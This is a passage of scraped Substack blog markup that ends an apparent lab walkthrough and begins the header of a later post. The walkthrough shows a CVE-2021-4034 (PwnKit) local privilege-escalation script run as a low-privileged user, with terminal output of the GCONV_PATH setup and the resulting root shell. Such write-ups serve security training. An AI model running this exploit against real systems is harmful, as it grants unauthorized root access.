class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!CWKD!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F74ecc805-d309-4b2f-8bdd-21ca09650d76_1651x796.png 424w, https://substackcdn.com/image/fetch/$s_!CWKD!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F74ecc805-d309-4b2f-8bdd-21ca09650d76_1651x796.png 848w, https://substackcdn.com/image/fetch/$s_!CWKD!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F74ecc805-d309-4b2f-8bdd-21ca09650d76_1651x796.png 1272w, https://substackcdn.com/image/fetch/$s_!CWKD!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F74ecc805-d309-4b2f-8bdd-21ca09650d76_1651x796.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ ls
out.json</code></pre></div><p>And this is what BloodPengu saw:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!ZtR6!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5a304fa5-2d6f-4080-be8b-9062d1ebdbd1_1922x912.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!ZtR6!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5a304fa5-2d6f-4080-be8b-9062d1ebdbd1_1922x912.png 424w, https://substackcdn.com/image/fetch/$s_!ZtR6!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5a304fa5-2d6f-4080-be8b-9062d1ebdbd1_1922x912.png 848w, https://substackcdn.com/image/fetch/$s_!ZtR6!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5a304fa5-2d6f-4080-be8b-9062d1ebdbd1_1922x912.png 1272w, https://substackcdn.com/image/fetch/$s_!ZtR6!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5a304fa5-2d6f-4080-be8b-9062d1ebdbd1_1922x912.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!ZtR6!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5a304fa5-2d6f-4080-be8b-9062d1ebdbd1_1922x912.png" width="1456" height="691" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/5a304fa5-2d6f-4080-be8b-9062d1ebdbd1_1922x912.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:691,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:701946,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/189616325?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5a304fa5-2d6f-4080-be8b-9062d1ebdbd1_1922x912.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!ZtR6!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5a304fa5-2d6f-4080-be8b-9062d1ebdbd1_1922x912.png 424w, https://substackcdn.com/image/fetch/$s_!ZtR6!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5a304fa5-2d6f-4080-be8b-9062d1ebdbd1_1922x912.png 848w, https://substackcdn.com/image/fetch/$s_!ZtR6!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5a304fa5-2d6f-4080-be8b-9062d1ebdbd1_1922x912.png 1272w, https://substackcdn.com/image/fetch/$s_!ZtR6!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5a304fa5-2d6f-4080-be8b-9062d1ebdbd1_1922x912.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>I think this is LARGE!</p><p>We have 3 Kernel Exploit according to this attack-paths</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!6PfJ!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1d100b35-4806-4bdd-a109-9ee37ff5cb41_1922x912.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!6PfJ!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1d100b35-4806-4bdd-a109-9ee37ff5cb41_1922x912.png 424w, https://substackcdn.com/image/fetch/$s_!6PfJ!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1d100b35-4806-4bdd-a109-9ee37ff5cb41_1922x912.png 848w, https://substackcdn.com/image/fetch/$s_!6PfJ!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1d100b35-4806-4bdd-a109-9ee37ff5cb41_1922x912.png 1272w, https://substackcdn.com/image/fetch/$s_!6PfJ!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1d100b35-4806-4bdd-a109-9ee37ff5cb41_1922x912.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!6PfJ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1d100b35-4806-4bdd-a109-9ee37ff5cb41_1922x912.png" width="1456" height="691" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/1d100b35-4806-4bdd-a109-9ee37ff5cb41_1922x912.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:691,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:440611,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/189616325?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1d100b35-4806-4bdd-a109-9ee37ff5cb41_1922x912.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!6PfJ!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1d100b35-4806-4bdd-a109-9ee37ff5cb41_1922x912.png 424w, https://substackcdn.com/image/fetch/$s_!6PfJ!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1d100b35-4806-4bdd-a109-9ee37ff5cb41_1922x912.png 848w, https://substackcdn.com/image/fetch/$s_!6PfJ!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1d100b35-4806-4bdd-a109-9ee37ff5cb41_1922x912.png 1272w, https://substackcdn.com/image/fetch/$s_!6PfJ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1d100b35-4806-4bdd-a109-9ee37ff5cb41_1922x912.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Q_bi!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffb766478-6c57-466e-9e8b-1d897f6532b6_1922x912.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Q_bi!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffb766478-6c57-466e-9e8b-1d897f6532b6_1922x912.png 424w, https://substackcdn.com/image/fetch/$s_!Q_bi!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffb766478-6c57-466e-9e8b-1d897f6532b6_1922x912.png 848w, https://substackcdn.com/image/fetch/$s_!Q_bi!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffb766478-6c57-466e-9e8b-1d897f6532b6_1922x912.png 1272w, https://substackcdn.com/image/fetch/$s_!Q_bi!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffb766478-6c57-466e-9e8b-1d897f6532b6_1922x912.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Q_bi!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffb766478-6c57-466e-9e8b-1d897f6532b6_1922x912.png" width="1456" height="691" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/fb766478-6c57-466e-9e8b-1d897f6532b6_1922x912.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:691,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:302973,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/189616325?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffb766478-6c57-466e-9e8b-1d897f6532b6_1922x912.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Q_bi!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffb766478-6c57-466e-9e8b-1d897f6532b6_1922x912.png 424w, https://substackcdn.com/image/fetch/$s_!Q_bi!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffb766478-6c57-466e-9e8b-1d897f6532b6_1922x912.png 848w, https://substackcdn.com/image/fetch/$s_!Q_bi!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffb766478-6c57-466e-9e8b-1d897f6532b6_1922x912.png 1272w, https://substackcdn.com/image/fetch/$s_!Q_bi!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffb766478-6c57-466e-9e8b-1d897f6532b6_1922x912.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>One of them are CVE-2021-4034, so we can just start to create or find a script for it.</p><p>I&#8217;m going to use this:</p><ul><li><p><a href="https://github.com/sickcodes/CVE-2021-4035">github.com/sickcodes/CVE-2021-4035</a></p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!jl7-!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fed3b9a31-3dc2-49a5-9be5-4a1ffdd5e0a5_1708x840.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!jl7-!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fed3b9a31-3dc2-49a5-9be5-4a1ffdd5e0a5_1708x840.png 424w, https://substackcdn.com/image/fetch/$s_!jl7-!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fed3b9a31-3dc2-49a5-9be5-4a1ffdd5e0a5_1708x840.png 848w, https://substackcdn.com/image/fetch/$s_!jl7-!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fed3b9a31-3dc2-49a5-9be5-4a1ffdd5e0a5_1708x840.png 1272w, https://substackcdn.com/image/fetch/$s_!jl7-!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fed3b9a31-3dc2-49a5-9be5-4a1ffdd5e0a5_1708x840.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!jl7-!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fed3b9a31-3dc2-49a5-9be5-4a1ffdd5e0a5_1708x840.png" width="1456" height="716" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/ed3b9a31-3dc2-49a5-9be5-4a1ffdd5e0a5_1708x840.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:716,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:247243,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/189616325?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fed3b9a31-3dc2-49a5-9be5-4a1ffdd5e0a5_1708x840.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!jl7-!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fed3b9a31-3dc2-49a5-9be5-4a1ffdd5e0a5_1708x840.png 424w, https://substackcdn.com/image/fetch/$s_!jl7-!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fed3b9a31-3dc2-49a5-9be5-4a1ffdd5e0a5_1708x840.png 848w, https://substackcdn.com/image/fetch/$s_!jl7-!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fed3b9a31-3dc2-49a5-9be5-4a1ffdd5e0a5_1708x840.png 1272w, https://substackcdn.com/image/fetch/$s_!jl7-!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fed3b9a31-3dc2-49a5-9be5-4a1ffdd5e0a5_1708x840.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Let&#8217;s run it. . .!!</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">love@election:/tmp$ id
uid=1000(love) gid=1000(love) groups=1000(love),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),116(lpadmin),126(sambashare)
love@election:/tmp$ bash pwn.sh
cc -Wall --shared -fPIC -o n3on.so n3on.c
cc -Wall    oneline.c   -o oneline
echo "module UTF-8// N3ON// n3on 1" &gt; gconv-modules
mkdir -p GCONV_PATH=.
cp /bin/true GCONV_PATH=./n3on.so:.
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),116(lpadmin),126(sambashare),1000(love)</code></pre></div><p>And now we are root. </p><p>One second we are local user, next second we&#8217;re root.</p><p>Happy hacking!</p><ul><li><p><a href="https://github.com/byt3n33dl3">GitHub</a></p></li><li><p><a href="mailto:byt3n33dl3@proton.me">Mail</a></p></li></ul>]]></content:encoded></item><item><title><![CDATA[Infra Assessor from WebApp to Local Machine: Part 23]]></title><description><![CDATA[Enumerate 2 Web Application leading to vuln Koken CMS access for File Upload evasion, collect credential that can be found is SMB shares. After initial access we PrivEsc to root via OverlayFS LPE.]]></description><link>https://byt3n33dl3.substack.com/p/infra-assessor-from-webapp-to-local-230</link><guid isPermaLink="false">https://byt3n33dl3.substack.com/p/infra-assessor-from-webapp-to-local-230</guid><dc:creator><![CDATA[Sulaiman]]></dc:creator><pubDate>Sun, 01 Mar 2026 06:32:05 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!Z7F3!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc9d9cdc0-0667-4b17-91df-e4c98b18b603_585x403.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Z7F3!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc9d9cdc0-0667-4b17-91df-e4c98b18b603_585x403.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Z7F3!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc9d9cdc0-0667-4b17-91df-e4c98b18b603_585x403.png 424w, https://substackcdn.com/image/fetch/$s_!Z7F3!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc9d9cdc0-0667-4b17-91df-e4c98b18b603_585x403.png 848w, https://substackcdn.com/image/fetch/$s_!Z7F3!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc9d9cdc0-0667-4b17-91df-e4c98b18b603_585x403.png 1272w, https://substackcdn.com/image/fetch/$s_!Z7F3!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc9d9cdc0-0667-4b17-91df-e4c98b18b603_585x403.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Z7F3!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc9d9cdc0-0667-4b17-91df-e4c98b18b603_585x403.png" width="725" height="499.44444444444446" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/c9d9cdc0-0667-4b17-91df-e4c98b18b603_585x403.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:403,&quot;width&quot;:585,&quot;resizeWidth&quot;:725,&quot;bytes&quot;:82862,&quot;alt&quot;:&quot;&quot;,&quot;title&quot;:&quot;&quot;,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/186053649?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc9d9cdc0-0667-4b17-91df-e4c98b18b603_585x403.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" title="" 